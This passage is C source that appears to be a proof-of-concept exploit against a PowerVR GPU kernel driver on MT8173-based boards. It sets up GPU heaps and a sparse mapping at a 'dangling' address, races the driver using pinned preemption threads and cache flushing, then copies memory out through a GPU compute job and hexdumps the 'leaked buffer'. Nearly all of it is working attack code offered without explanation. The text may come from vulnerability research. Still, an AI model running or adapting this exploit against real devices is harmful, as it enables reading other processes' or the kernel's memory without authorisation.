    usleep(10*1000);
  }
}

/* =====================   MAIN   ===================== */
#define CDM_COMMANDS_ADDR  0x80c0de0000
#define DANGLING_ADDR      0x8055550000
#define COPY_BUFFER_ADDR   0x80dddd0000
#define PDS_CODE_DATA_ADDR 0xDAD0000000
int main(void) {
  setbuf(stdout, NULL);
  // On MT8173 as used by hana boards:
  //  - cores 0 and 1 are the slow in-order cores (A53)
  //  - 2 and 3 are fast out-of-order cores (A72)
  //
  // Let the main thread run on its own fast core while the other threads are
  // deliberately pinned to a shared core.
  pin_to(2);

  printf("PID=%d\n", getpid());
  gpu_fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
  srvkm_init(gpu_fd, PVR_SRVKM_SERVICES_INIT);
  IMG_HANDLE hPrivData;
  IMG_HANDLE ctx = create_device_memory_context(&hPrivData);

  heap_general = create_heap(ctx, 0x8000000000, 0x2000000000, 12);
  IMG_HANDLE heap_general_carveout_res = create_reservation(heap_general, 0x8000000000, 0x10000);
  IMG_HANDLE heap_general_carveout_pmr = alloc_pmr_uncached(0x10000);
  map_pmr(heap_general, heap_general_carveout_pmr, heap_general_carveout_res);

  IMG_HANDLE heap_pds = create_heap(ctx, 0xDA00000000, 0x0100000000, 12);
  IMG_HANDLE heap_pds_carveout_res = create_reservation(heap_pds, 0xDA00000000, 0x10000);
  IMG_HANDLE heap_pds_carveout_pmr = alloc_pmr_uncached(0x10000);
  map_pmr(heap_pds, heap_pds_carveout_pmr, heap_pds_carveout_res);

  IMG_HANDLE heap_usc = create_heap(ctx, 0xE000000000, 0x0100000000, 12);
  IMG_HANDLE heap_usc_carveout_res = create_reservation(heap_usc, 0xE000000000, 0x10000);
  IMG_HANDLE heap_usc_carveout_pmr = alloc_pmr_uncached(0x10000);
  map_pmr(heap_usc, heap_usc_carveout_pmr, heap_usc_carveout_res);


  IMG_HANDLE cdm_commands_res = create_reservation(heap_general, CDM_COMMANDS_ADDR, 0x10000);
  IMG_HANDLE cdm_commands_pmr = alloc_pmr_uncached(0x10000);
  map_pmr(heap_general, cdm_commands_pmr, cdm_commands_res);
  uint32_t *cdm_commands_map = mmap(NULL, 0x10000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (uint64_t)cdm_commands_pmr<<12);

  IMG_HANDLE pds_res = create_reservation(heap_pds, PDS_CODE_DATA_ADDR, 0x100000);
  IMG_HANDLE pds_pmr = alloc_pmr_uncached(0x100000);
  map_pmr(heap_pds, pds_pmr, pds_res);
  uint32_t *pds_map = mmap(NULL, 0x100000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (uint64_t)pds_pmr<<12);

  source_res = create_reservation( heap_general, DANGLING_ADDR, PMR_LEN);
  source_pmr = alloc_pmr_sparse(PMR_LEN);
  map_pmr(heap_general, source_pmr, source_res);

  IMG_HANDLE dest_res = create_reservation(heap_general, COPY_BUFFER_ADDR, 0x1000);
  IMG_HANDLE dest_pmr = alloc_pmr_uncached(0x1000);
  map_pmr(heap_general, dest_pmr, dest_res);
  unsigned char *dest_map = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, gpu_fd, (uint64_t)dest_pmr<<12);

  struct rogue_fwif_cdm_regs_cswitch cswitch_regs = {
  };
  memset(&cswitch_regs, 0x41, sizeof(cswitch_regs));
  IMG_HANDLE hComputeContext;
  {
    PVRSRV_BRIDGE_IN_RGXCREATECOMPUTECONTEXT in = {
      .ui64RobustnessAddress = 0,
      .hPrivData = hPrivData,
      /* no reset command */
      .pui8FrameworkCmd = NULL,
      .ui32FrameworkCmdize = 0,

      .pui8StaticComputeContextState = (void*)&cswitch_regs,
      .ui32StaticComputeContextStateSize = sizeof(cswitch_regs),
      .ui32ContextFlags = 1/*RGX_CONTEXT_FLAG_DISABLESLR*/,
      .ui32MaxDeadlineMS = UINT_MAX,
      .ui32PackedCCBSizeU88 = 0,
      .ui32Priority = 2/*RGX_CONTEXT_PRIORITY_HIGH*/,
    };
    PVRSRV_BRIDGE_OUT_RGXCREATECOMPUTECONTEXT out;
    do_driver_cmd(PVRSRV_BRIDGE_RGXCMP, PVRSRV_BRIDGE_RGXCMP_RGXCREATECOMPUTECONTEXT);
    hComputeContext = out.hComputeContext;
  }

  pthread_t preempt_me_thread;
  if (pthread_create(&preempt_me_thread, NULL, preempt_me_thread_fn, NULL))
    errx(1, "pthread_create");
  pthread_t preempter_thread;
  if (pthread_create(&preempter_thread, NULL, preempter_thread_fn, NULL))
    errx(1, "pthread_create");

#define CACHE_FLUSH_LEN (1024*1024*32)
  unsigned char *cache_flush_area = malloc(CACHE_FLUSH_LEN);
  if (cache_flush_area == NULL)
    errx(1, "malloc");

  while (1) {
    // readback
    memset(dest_map, 'D', 0x100);

    uint64_t src_addr = DANGLING_ADDR;
    uint64_t dst_addr = COPY_BUFFER_ADDR;

    /*
    uint64_t dst_addr = DANGLING_ADDR;
    uint64_t src_addr = COPY_BUFFER_ADDR;
    */

    generate_pds_memcpy((void*)cdm_commands_map, (void*)pds_map, PDS_CODE_DATA_ADDR, dst_addr, src_addr, 0x100);
    struct rogue_fwif_cmd_compute compute_cmd = {
      .tpu_border_colour_table = 0xaa0000 >> 2,
      .cdm_cb_maybe = CDM_COMMANDS_ADDR,
      .cdm_context_state_base_addr_maybe = 0xcc0000,
      .tpu_maybe = 0x21,
      .cdm_resume_pds1_maybe = (0x0090080a), // TODO
      .some_flags_maybe = 0x100, // TODO
    };


    while (!dumpable_preempted) /*spin*/;

    memset(cache_flush_area, 'F', CACHE_FLUSH_LEN);

    int result_fence_fd;
    {
      PVRSRV_BRIDGE_IN_RGXKICKCDM2 in = {
        .ui64DeadlineInus = UINT_MAX,
        .hComputeContext = hComputeContext,
        .pui8DMCmd = (char*)&compute_cmd,
        .ui32CmdSize = sizeof(compute_cmd),
        .puiUpdateFenceName = "mycdmfence",
        .hCheckFenceFd = -1,
        .hUpdateTimeline = /*tl_fd*/-1,
        .ui32NumOfWorkgroups = 0,
        .ui32NumOfWorkitems = 0
      };
      PVRSRV_BRIDGE_OUT_RGXKICKCDM2 out;
      do_driver_cmd(PVRSRV_BRIDGE_RGXCMP, PVRSRV_BRIDGE_RGXCMP_RGXKICKCDM2);
      result_fence_fd = out.hUpdateFence;
    }

    usleep(100*1000);

    bool got_data = false;
    for (int i=0; i<0x100; i++) {
      if (dest_map[i] != 'D')
        got_data = true;
    }

    if (got_data) {
      printf("leaked buffer (if it worked):\n");
      hexdump_addr(dest_map, 0x100, src_addr, 2);
    }

    dumpable_preempted = 0;
  }
}
